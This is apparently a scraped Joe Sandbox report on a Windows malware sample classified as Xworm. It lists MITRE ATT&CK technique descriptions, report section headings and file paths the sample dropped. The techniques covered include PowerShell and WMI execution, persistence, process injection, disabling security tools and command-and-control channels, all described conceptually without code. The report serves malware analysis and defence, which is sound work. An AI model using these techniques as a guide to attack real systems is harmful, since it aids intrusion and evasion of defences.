Instruction ID: 0f10769e38d8778d3677c97269a25c6a4236e0071ea659fb065ca8ed019d7177
Opcode Fuzzy Hash: d6556517390ed67a43ec549caadbfb40ee25d57b0852f13b47d8711bb70da7d5
Instruction Fuzzy Hash: 3D01262190C6C40FE7827B3C6C614B5BFE08FE3661B8806A7F889C71DAEC08594587A2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ifrnete.be1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bz4rvc4.1em.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rkc1uz4.ewg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53ysvqk3.vet.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gs0cgxs.ysn.ps1

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre